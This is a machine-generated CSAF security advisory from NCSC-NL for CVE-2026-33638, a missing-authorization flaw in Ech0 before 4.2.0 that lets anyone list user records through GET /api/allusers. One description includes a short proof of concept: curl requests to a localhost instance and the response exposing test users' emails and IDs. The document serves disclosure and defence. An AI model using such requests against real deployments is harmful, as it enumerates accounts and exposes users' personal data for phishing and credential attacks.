{ "document": { "category": "csaf_base", "csaf_version": "2.0", "distribution": { "tlp": { "label": "WHITE" } }, "lang": "en", "notes": [ { "category": "legal_disclaimer", "text": "The Netherlands Cyber Security Center (henceforth: NCSC-NL) maintains this portal to enhance access to its information and vulnerabilities. The use of this information is subject to the following terms and conditions:\n\nThe vulnerabilities disclosed in this portal are gathered by NCSC-NL from a variety of open sources, which the user can retrieve from other platforms. NCSC-NL makes every reasonable effort to ensure that the content of this portal is kept up to date, and that it is accurate and complete. Nevertheless, NCSC-NL cannot entirely rule out the possibility of errors, and therefore cannot give any warranty in respect of its completeness, accuracy or real-time keeping up-to-date. NCSC-NL does not control nor guarantee the accuracy, relevance, timeliness or completeness of information obtained from these external sources. The vulnerabilities disclosed in this portal are intended solely for the convenience of professional parties to take appropriate measures to manage the risks posed to the cybersecurity. No rights can be derived from the information provided therein.\n\nNCSC-NL and the Kingdom of the Netherlands assume no legal liability or responsibility for any damage resulting from either the use or inability of use of the vulnerabilities disclosed in this portal. This includes damage resulting from the inaccuracy of incompleteness of the information contained in it.\nThe information on this page is subject to Dutch law. All disputes related to or arising from the use of this portal regarding the disclosure of vulnerabilities will be submitted to the competent court in The Hague. This choice of means also applies to the court in summary proceedings." } ], "publisher": { "category": "coordinator", "contact_details": "cert@ncsc.nl", "name": "National Cyber Security Centre", "namespace": "https://www.ncsc.nl/" }, "title": "CVE-2026-33638", "tracking": { "current_release_date": "2026-03-31T21:26:52.750247Z", "generator": { "date": "2026-02-17T15:00:00Z", "engine": { "name": "V.E.L.M.A", "version": "1.7" } }, "id": "CVE-2026-33638", "initial_release_date": "2026-03-24T23:11:51.595426Z", "revision_history": [ { "date": "2026-03-24T23:11:51.595426Z", "number": "1", "summary": "CVE created.| Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| References created (4).| CWES updated (1)." }, { "date": "2026-03-24T23:12:02.335490Z", "number": "2", "summary": "NCSC Score created." }, { "date": "2026-03-25T18:12:43.655207Z", "number": "3", "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| Products created (1).| References created (3).| CWES updated (1)." }, { "date": "2026-03-25T18:12:46.359550Z", "number": "4", "summary": "NCSC Score updated." }, { "date": "2026-03-26T21:27:38.300851Z", "number": "5", "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| References created (3).| CWES updated (1)." }, { "date": "2026-03-26T21:27:44.435086Z", "number": "6", "summary": "NCSC Score updated." }, { "date": "2026-03-26T21:38:40.875714Z", "number": "7", "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| Products created (1).| References created (3).| CWES updated (1)." }, { "date": "2026-03-26T21:38:51.697962Z", "number": "8", "summary": "NCSC Score updated." }, { "date": "2026-03-27T00:13:40.003679Z", "number": "9", "summary": "Source created.| CVE status created. (valid)| Description created for source.| References created (3)." }, { "date": "2026-03-27T20:56:37.700224Z", "number": "10", "summary": "Source connected.| CVE status created. (valid)| EPSS created." }, { "date": "2026-03-27T20:56:43.724523Z", "number": "11", "summary": "NCSC Score updated." }, { "date": "2026-03-27T21:26:24.804791Z", "number": "12", "summary": "Unknown change." }, { "date": "2026-03-28T07:57:39.238388Z", "number": "13", "summary": "References created (1)." }, { "date": "2026-03-30T20:47:06.818997Z", "number": "14", "summary": "Description removed for source.| Description created for source." }, { "date": "2026-03-30T20:47:08.606105Z", "number": "15", "summary": "NCSC Score updated." }, { "date": "2026-03-31T21:25:05.567245Z", "number": "16", "summary": "Products created (1).| Product Identifiers created (1)." }, { "date": "2026-03-31T21:25:07.475160Z", "number": "17", "summary": "NCSC Score updated." } ], "status": "interim", "version": "17" } }, "product_tree": { "branches": [ { "branches": [ { "branches": [ { "category": "product_version_range", "name": "vers:unknown/<4.2.0", "product": { "name": "vers:unknown/<4.2.0", "product_id": "CSAFPID-5919275" } } ], "category": "product_name", "name": "Ech0" }, { "branches": [ { "category": "product_version_range", "name": "vers:unknown/>=0|<1.4.8-0.20260322121226-acbf1fd71011", "product": { "name": "vers:unknown/>=0|<1.4.8-0.20260322121226-acbf1fd71011", "product_id": "CSAFPID-5907186" } } ], "category": "product_name", "name": "ech0" } ], "category": "vendor", "name": "lin-snow" }, { "branches": [ { "branches": [ { "category": "product_version_range", "name": "vers:unknown/<4.2.0", "product": { "name": "vers:unknown/<4.2.0", "product_id": "CSAFPID-5969598", "product_identification_helper": { "cpe": "cpe:2.3:a:ech0:ech0:*:*:*:*:*:*:*:*" } } } ], "category": "product_name", "name": "ech0" } ], "category": "vendor", "name": "ech0" } ] }, "vulnerabilities": [ { "cve": "CVE-2026-33638", "cwe": { "id": "CWE-862", "name": "Missing Authorization" }, "notes": [ { "category": "description", "text": "## Summary\n`GET /api/allusers` is mounted as a public endpoint and returns user records without authentication. This allows remote unauthenticated user enumeration and exposure of user profile metadata.\n\n## Details\nThe route is registered under public routes:\n\n- `internal/router/user.go:17`\n - `appRouterGroup.PublicRouterGroup.GET(\"/allusers\", h.UserHandler.GetAllUsers())`\n\nThe handler itself is documented as requiring authentication:\n\n- `internal/handler/user/user.go:177-185`\n - API docs/annotations indicate auth requirement (`@Security ApiKeyAuth`).\n\n## PoC\n\n### 1) Negative control: endpoint that should require auth\n\nRequest: \n```bash\ncurl -i \"http://localhost:6277/api/user\"\n```\n\nResponse:\n```bash\nHTTP/1.1 401 Unauthorized\nAccess-Control-Allow-Headers: *\nAccess-Control-Allow-Methods: POST, GET, OPTIONS, DELETE, PATCH, PUT\nAccess-Control-Expose-Headers: Content-Length, Access-Control-Allow-Origin, Access-Control-Allow-Headers, Content-Type\nCache-Control: no-store, no-cache, must-revalidate, proxy-revalidate, max-age=0\nContent-Language: zh-CN\nContent-Type: application/json; charset=utf-8\nExpires: 0\nPragma: no-cache\nSurrogate-Control: no-store\nDate: Sun, 22 Mar 2026 07:21:22 GMT\nContent-Length: 135\n\n{\"code\":0,\"msg\":\"未找到令牌,请点击右上角登录\",\"error_code\":\"TOKEN_MISSING\",\"message_key\":\"auth.token_missing\",\"data\":null}\n```\n\n### 2) Trigger: call public user-list endpoint without auth\n\nRequest:\n```bash\ncurl -i \"http://localhost:6277/api/allusers\"\n```\n\nResponse:\n```bash\nHTTP/1.1 200 OK\nAccess-Control-Allow-Headers: *\nAccess-Control-Allow-Methods: POST, GET, OPTIONS, DELETE, PATCH, PUT\nAccess-Control-Expose-Headers: Content-Length, Access-Control-Allow-Origin, Access-Control-Allow-Headers, Content-Type\nContent-Language: zh-CN\nContent-Type: application/json; charset=utf-8\nDate: Sun, 22 Mar 2026 07:21:56 GMT\nContent-Length: 912\n\n{\"code\":1,\"msg\":\"获取用户列表成功\",\"data\":[{\"id\":\"019d144a-18fa-7db3-a2dd-310604210abd\",\"username\":\"h1_poc_1774161893_1\",\"email\":\"h1_poc_1774161893_1@example.com\",\"is_admin\":false,\"is_owner\":false,\"avatar\":\"\",\"locale\":\"zh-CN\"},{\"id\":\"019d144a-1904-7c0a-98ec-656079a82c64\",\"username\":\"h1_poc_1774161893_2\",\"email\":\"h1_poc_1774161893_2@example.com\",\"is_admin\":false,\"is_owner\":false,\"avatar\":\"\",\"locale\":\"zh-CN\"},{\"id\":\"019d144a-190b-70f8-89cb-4f8ab46cec9b\",\"username\":\"h1_poc_1774161893_3\",\"email\":\"h1_poc_1774161893_3@example.com\",\"is_admin\":false,\"is_owner\":false,\"avatar\":\"\",\"locale\":\"zh-CN\"},{\"id\":\"019d144a-e7dc-7cef-9395-4d0e392a5278\",\"username\":\"alice\",\"email\":\"alice@example.com\",\"is_admin\":false,\"is_owner\":false,\"avatar\":\"\",\"locale\":\"zh-CN\"},{\"id\":\"019d144a-e7e3-79f3-bb09-0ea758333a54\",\"username\":\"bob\",\"email\":\"bob@example.com\",\"is_admin\":false,\"is_owner\":false,\"avatar\":\"\",\"locale\":\"zh-CN\"}]}\n```\n\n## Impact\n**Vulnerability type:** Access control bypass / unauthenticated data exposure. \n**Who is impacted:** Any deployment exposing the API to untrusted networks, and all users whose profile metadata can be enumerated. \n**Business/security impact:** Enables account reconnaissance and targeted credential attacks.\n\nA fix is available at https://github.com/lin-snow/Ech0/releases/tag/v4.2.0.", "title": "osv - https://www.googleapis.com/download/storage/v1/b/osv-vulnerabilities/o/Go%2FGHSA-m983-7426-5hrj.json?alt=media" }, { "category": "description", "text": "Ech0 is an open-source, self-hosted publishing platform for personal idea sharing. Prior to version 4.2.0, `GET /api/allusers` is mounted as a public endpoint and returns user records without authentication. This allows remote unauthenticated user enumeration and exposure of user profile metadata. A fix is available in v4.2.0.", "title": "nvd - https://services.nvd.nist.gov/rest/json/cves/2.0?cveId=CVE-2026-33638" }, { "category": "description", "text": "Ech0 is an open-source, self-hosted publishing platform for personal idea sharing. Prior to version 4.2.0, `GET /api/allusers` is mounted as a public endpoint and returns user records without authentication. This allows remote unauthenticated user enumeration and exposure of user profile metadata. A fix is available in v4.2.0.", "title": "cveprojectv5 - https://raw.githubusercontent.com/CVEProject/cvelistV5/main/cves/2026/33xxx/CVE-2026-33638.json" }, { "category": "description", "text": "Ech0 authenticated user-list exposed data via public `/api/allusers` endpoint in github.com/lin-snow/ech0", "title": "osv - https://www.googleapis.com/download/storage/v1/b/osv-vulnerabilities/o/Go%2FGO-2026-4838.json?alt=media" }, { "category": "description", "text": "### Summary\nA public access-control flaw allows unauthenticated users to retrieve the full user list from `GET /api/allusers`. This exposes user profile metadata to anyone who can reach the application and enables remote user enumeration.\n\n### Details\nThe vulnerable route is registered as a public endpoint:\n\n- `internal/router/user.go:17`\n - `appRouterGroup.PublicRouterGroup.GET(\"/allusers\", h.UserHandler.GetAllUsers())`\n\nHowever, the handler appears to have been intended as an authenticated endpoint:\n\n- `internal/handler/user/user.go:177-185`\n - API annotations indicate an authentication requirement via `@Security ApiKeyAuth`\n\nThis creates a mismatch between the documented security model and the actual routing configuration. As a result, requests to `GET /api/allusers` succeed without authentication and return user records, including profile metadata such as usernames, email addresses, role-related flags, avatar values, and locale information.\n\nA negative control against another endpoint that correctly requires authentication further supports that this exposure is unintended: `GET /api/user` returns `401 Unauthorized` when no token is supplied, while `GET /api/allusers` remains publicly accessible.\n\n### Impact\n- **Type:** Access control bypass / unauthenticated data exposure\n- **Who is impacted:** Any deployment exposing the API to untrusted networks, and all users whose profile metadata is returned by the endpoint\n- **Security impact:** Enables remote user enumeration and disclosure of user profile metadata, which may facilitate account reconnaissance, phishing, and targeted credential attacks\n- **Attack preconditions:** None beyond network access to the affected API endpoint", "title": "github - https://api.github.com/advisories/GHSA-m983-7426-5hrj" }, { "category": "other", "text": "0.00062", "title": "EPSS" }, { "category": "other", "text": "4.4", "title": "NCSC Score" }, { "category": "other", "text": "The value of the most recent EPSS score", "title": "NCSC Score top decreasing factors" } ], "product_status": { "known_affected": [ "CSAFPID-5907186", "CSAFPID-5919275", "CSAFPID-5969598" ] }, "references": [ { "category": "external", "summary": "Source - github", "url": "https://api.github.com/advisories/GHSA-m983-7426-5hrj" }, { "category": "external", "summary": "Source - osv", "url": "https://www.googleapis.com/download/storage/v1/b/osv-vulnerabilities/o/Go%2FGHSA-m983-7426-5hrj.json?alt=media" }, { "category": "external", "summary": "Source - nvd", "url": "https://services.nvd.nist.gov/rest/json/cves/2.0?cveId=CVE-2026-33638" }, { "category": "external", "summary": "Source - cveprojectv5", "url": "https://raw.githubusercontent.com/CVEProject/cvelistV5/main/cves/2026/33xxx/CVE-2026-33638.json" }, { "category": "external", "summary": "Source - osv", "url": "https://www.googleapis.com/download/storage/v1/b/osv-vulnerabilities/o/Go%2FGO-2026-4838.json?alt=media" }, { "category": "external", "summary": "Source - first", "url": "https://api.first.org/data/v1/epss?limit=10000&offset=0" }, { "category": "external", "summary": "Reference - cveprojectv5; github; nvd; osv", "url": "https://github.com/lin-snow/Ech0/security/advisories/GHSA-m983-7426-5hrj" }, { "category": "external", "summary": "Reference - cveprojectv5; github; nvd; osv", "url": "https://github.com/lin-snow/Ech0/commit/acbf1fd71011e6b9e1e6a911128056a19862f681" }, { "category": "external", "summary": "Reference - cveprojectv5; github; nvd; osv", "url": "https://github.com/lin-snow/Ech0/releases/tag/v4.2.0" }, { "category": "external", "summary": "Reference - github", "url": "https://github.com/advisories/GHSA-m983-7426-5hrj" }, { "category": "external", "summary": "Reference - github", "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33638" } ], "scores": [ { "cvss_v3": { "version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM" }, "products": [ "CSAFPID-5907186", "CSAFPID-5919275", "CSAFPID-5969598" ] } ], "title": "CVE-2026-33638" } ] }